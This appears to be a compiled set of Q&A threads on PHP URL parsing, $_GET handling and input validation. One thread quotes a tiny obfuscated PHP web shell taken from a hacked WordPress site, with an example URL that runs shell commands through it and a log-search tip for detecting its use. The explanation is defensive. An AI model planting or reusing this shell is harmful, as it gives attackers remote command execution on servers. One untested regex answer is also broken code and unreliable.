get the '/foo' out of 'http://someplace.com/index.php/foo'

get the '/foo' out of 'http://someplace.com/index.php/foo' - php

As far as I know php has an function to get the '/foo/bar/' out of a URL like: 'http://someplace.com/index.php/foo/bar/'
Can't remember what the function is called.
[edit]
I remember using something like this in ExpressionEngine (see this). And later coming over an article explaining such a function build in PHP. However I can't recall what it was.
[edit #2]
I know that there are functions to get out the URL and several to manipulate it. However I clearly remember that there were one function doing just this specific thing. Look at the ExpressionEngine example I linked to too get a better understanding of what I mean.
[edit #3]
It wasn't ExpressionEngine I had used. It was CodeIngniter. But it's basically the same thing.
[edit #4]
Maybe I am wrong. I just remembering walking over just such a function in an article once...
Case closed (unless someone stumble upon just such a function).

I believe you are looking for parse_url.
parse_url('http://someplace.com/index.php/foo');
/*
Array
(
[scheme] => http
[host] => someplace.com
[path] => /index.php/foo
)
*/
You can then manipulate the path item to remove /index.php.

It's not a function. It's a variable: $_SERVER['PATH_INFO']

That's $_SERVER['PATH_INFO']. It may not be available on all systems, it's dependent on th ewebserver passing it on. In Apache, that's the AcceptPathInfo option.
response to gregoire:
It's impossible to pull out path_info from a url with 100% reliability unless it's being done on the webserver handling that url at the time - you cannot tell where the actual script part ends and the path_info starts, especially if the path is something like
/a/b/c/scriptishere/path/info
There's no '.html', or '.php', or '.aspx' or whatever to even given you a hint. As such, this is the only way to 100% reliably answer the OP's question. Anything else is a guess - even "index.php" in the OP's sample could be a directory and the actual script is 'foo'

If the string is always going to have index.php in it, why not just substr, like so:
$url = "http://someplace.com/index.php/foo/bar/";
$delim = 'index.php';
$path = substr($url,strpos($url,$delim)+strlen($delim));
Thats a little verbose, but if you could clarify where this string is coming from what parts are going to change I could give a more concise answer.
You could also use regular expressions:
$matches = array();
preg_match('index.php\/(.*)$',$matches);
$matches will contain the matched string in index 1, index 0 will be the original string.
I didn't test that regex, but something like that should work.

Related

Can you accurately process a directory structure by URI alone?

Take the following complex URI (or path, what have you).
/directory/subdirectory/flashy-seo-directory/?query=123&complexvar=abc/123etc
Take this simpler one.
/directory/?query=123
What methodology would you use to accurate process the URI to seperate the directory from the filename/query/etc?
I know how to do this in simple, expected, and typical case scenarios where everything is formatted "normally" or "favorably" but what I'd like to know is if the following example will accurately cover all possible valid directory names/structures/queries/etc. For example I once seen a URI like this that I don't quite understand: /directory/index.php/something/?query=123. Not even sure what's going on there.
Methodology (not dependent on any specific programming language, though I am using PHP for this)
explode entire URI by / placing each bit in a neat array
$bits = explode( '/', $uri );
Loop through each array item and determine(?) at what point we've "reached" the portion of the URI that is no longer directory structure
Note which array key is no longer directory structure and implode the prior keys to assemble the directory
--
My ideas for Step 2. was going to be basically check to make sure there are no query specific characters (?, &, =). I haven't seen any directories with .s in them, but as you can see you can have a query variable such as ?q=abc/123 so simply checking for / wouldn't work. I've seen directories with the ~ symbol so it so a simple [A-Za-z0-9-] regex might not work in every scenario. Wondering how Step 2. can be done accurately.
This is needed seeing as the URI can capture a "virtual directory" the script may be running under that doesn't actually exist anywhere, perhaps via .htaccess for SEO or what have you. And so needs to be properly and accurately "accounted for" in order to have robust and flexible functionality throughout.

If you are only interested in the path part, and there is no host involved, then you only need to split (explode) the string at the first valid URI path delimiter.
Valid delimiters: ; # ?
$uri = "/directory/flashy-seo-directory/?query=123&complexvar=abc/123etc";
foreach (str_split("#;?") as $dlm) {
$uri = str_contains($uri, $dlm) ? explode($dlm, $uri, 2)[0] : $uri;
}
echo($uri);
Result:
/directory/flashy-seo-directory/

I suppose you're looking for parse_url()
https://www.php.net/manual/en/function.parse-url

PHP filename parameter query

First of all I have checked the other suggested answers and I'm not certain whether they actually cover the question I've got. I'm very new to PHP so please forgive me if I am asking what sounds like a stupid question.
I have a php file which is called from another php file with a parameter
I understand how this works in the calling file.
I don't understand how to extract the parameter contents into a variable at the target end.
Let's say for a moment that in the address bar of the browser I get this:
targetfilename?parameter=Fred_hippy
I now want to pass "Fred" and "hippy" to a two-element array inside targetname.php. That's it, nothing else. (I said I was new to PHP.)
I think the way to do this is:
$file = substr($targetfilename, 13);
$name = explode("_", $file);
Is that correct please? If not could somebody tweak it please?
Thanks.

All parameters (everything after the ?) are returned as $_GET or $_POST array. If you are typing into the address bar (as opposed to using a FORM) then it is always GET. PHP makes it really easy:
$parameter = $_GET['parameter'];
$name = explode("_",$parameter);
That leaves $name[0] = 'Fred' and $name[1] = 'hippy'.
In older versions of PHP, the $_GET to variable assignment was done automagically, which was very useful but also opened a lot of possible security issues, so that has been deprecated.
Another note based on comments. An alternative to:
targetfilename?parameter=Fred_hippy
is
targetfilename?name=Fred&status=hippy
which would be read in PHP as:
$name = $_GET['name'];
$status = $_GET['status'];
with no explode() needed. Basically, PHP understands the standard protocol for sending parameters via GET & POST and takes care of a lot of the details for you.

What does this line of PHP code do?

I extracted this from a wordpress-site, that happened to be infected and gets cleaned up by me.
<?php ($_=#$_GET[page]).#$_($_POST[404]);?>
I suspect this line to be SEO spam, but I am not able to get the meaning of this line.

It's a PHP shell. If you rewrite it to the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.
You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.
Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.
/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.
PS: That was answered before here

Let's break this up a little bit:
($_=#$_GET[page]) . #$_($_POST[404]); First, this is two expressions being concatenated with the period: () . ().
In the first expression, $_ = $_GET[page], $_ is a variable, and is being assigned = to the variable $_GET['page'], or perhaps the output of an anonymous function it references. If $_GET[page] does reference an anonymous function, the # would be suppressing any errors from it.
The second expression, # $_( $_POST[404] ); is starting off with error suppression # of the anonymous function $_, which you can tell now is an anonymous function being called because it's followed by (. The argument passed to this function is $_POST['404'], and then the second parentheses just closes the call.
So I think your suspicions are correct; this looks like obfuscated code intended to look innocuous or part of the site. I suspect that the values for $_GET[page] and $_POST[404] are perhaps javascript strings whose echoing on the page would install malware or adware.
You can debug this more by looking at the values of those two variables and seeing what they are.
As best I can tell without knowing the values in GET and POST, it looks like the variable $_ is being assigned to the string $_GET[page], which would be whatever someone submits in the URL when they load the page. So, they are able to pass the string name of any function to the site and have it in PHP's scope.
Then, they are running that arbitrary function on the $_POST['404'] value. That value also is whatever the browser or user POSTs to the page.
The concatenation and outer parenthesis ().() might just be more obfuscation, or the point of this code might be to simply echo the results of this code on the page (to inject javascript) for example. But, it's also possible they are calling whatever function they want on whatever argument they've passed. I can't tell just by looking, but someone more conversant with PHP probably could.

How to deal with question mark in url in php single entry website

I'm dealing with two question marks in a single entry website.
I'm trying to use urlencode to handle it.
The original URL:
'search.php?query='.quote_replace(addmarks($search_results['did_you_mean'])).'&search=1'
I want to use it in the single entry website:
'index.php?page='.urlencode('search?query='.quote_replace(addmarks($search_results['did_you_mean'])).'&search=1')
It doesn't work, and I don't know if I must use urldecode and where I can use it also.

Why not just rewrite it to become
index.php?page=search&query=...
mod_rewrite will do this for you if you use the [QSA] (query string append) flag.
http://wiki.apache.org/httpd/RewriteQueryString

$_SERVER['QUERY_STRING'] will give you everything after the first "?" in a URL.
From here you can parse using "explode" or common sting functions.
Example:
http://xxx/info.php?test=1?test=2&test=3
$_SERVER['QUERY_STRING'] =>test=1?test=2&test=3
list($localURL, $remoteURL) = explode("?", $_SERVER['QUERY_STRING']);
$localURL => 'test=1'
$remoretURL =>'test=2&test=3'
Hope this helps

I would suggest you to change the logic of the server code to handle simpler query form. This way it is probably going to lead you nowhere in very near future.
Use
index.php?page=search&query=...
as your query format but do not overwrite it with mod_rewrite to your first wanted format just to satisfy your current application logic, but handle it with some better logic on the server side. Write some ifs and thens, switches and cases ... but do not try to put the logic of the application into your URLs. It will make you really awkward URLs and soon you'll see that there is no lot of space in that layer to handle all the logic you will need. :)

PHP - securing parameters passed in the URL

I have an application which makes decisions based on part of URL:
if ( isset($this->params['url']['url']) ) {
$url = $this->params['url']['url'];
$url = explode('/',$url);
$id = $this->Provider->getProviderID($url[0]);
$this->providerName = $url[0]; //set the provider name
return $id;
}
This happens to be in a cake app so $this->params['url'] contains an element of URL. I then use the element of the URL so decide which data to use in the rest of my app. My question is...
whats the best way to secure this input so that people can't pass in anything nasty?
thanks,

Other comments here are correct, in AppController's beforeFilter validate the provider against the providers in your db.
However, if all URLs should be prefixed with a provider string, you are going about extracting it from the URL the wrong way by looking in $this->params['url'].
This kind of problem is exactly what the router class, and it's ability to pass params to an action is for. Check out the manual page in the cookbook http://book.cakephp.org/view/46/Routes-Configuration. You might try something like:
Router::connect('/:provider/:controller/:action');
You'll also see in the manual the ability to validate the provider param in the route itself by a regex - if you have a small definite list of known providers, you can hard code these in the route regex.
By setting up a route that captures this part of the URL it becomes instantly available in $this->params['provider'], but even better than that is the fact that the html helper link() method automatically builds correctly formatted URLs, e.g.
$html->link('label', array(
'controller' => 'xxx',
'action' => 'yyy',
'provider' => 'zzz'
));
This returns a link like /zzz/xxx/yyy

What are valid provider names? Test if the URL parameter is one, otherwise reject it.
Hopefully you're aware that there is absolutely no way to prevent the user from submitting absolutely anything, including provider names they're not supposed to use.

I'd re-iterate Karsten's comment: define "anything nasty"
What are you expecting the parameter to be? If you're expecting it to be a URL, use a regex to validate URLs. If you're expecting an integer, cast it to an integer. Same goes for a float, boolean, etc.
These PHP functions might be helpful though:
www.php.net/strip_tags
www.php.net/ctype_alpha

the parameter will be a providername - alphanumeric string. i think the answer is basically to to use ctype_alpha() in combination with a check that the providername is a valid one, based on other application logic.
thanks for the replies

Also, if you have a known set of allowable URLs, a good idea is to whitelist those allowed URLs. You could even do that dynamically by having a DB table that contains the allowed URLs -- pull that from the database, make a comparison to the URL parameter passed. Alternatively, you could whitelist patterns (say you have allowed domains that can be passed, but the rest of the url changes... You can whitelist the domain and/ or use regexps to determine validity).
At the very least, make sure you use strip_tags, or the built-in mysql escape sequences (if using PHP5, parameterizing your SQL queries solves these problems).

It would be more cake-like to use the Sanitize class. In this case Sanitize::escape() or Sanitize::paranoid() seem appropriate.

We Keep Coding

PHP, A popular general-purpose scripting language that is especially suited to web development.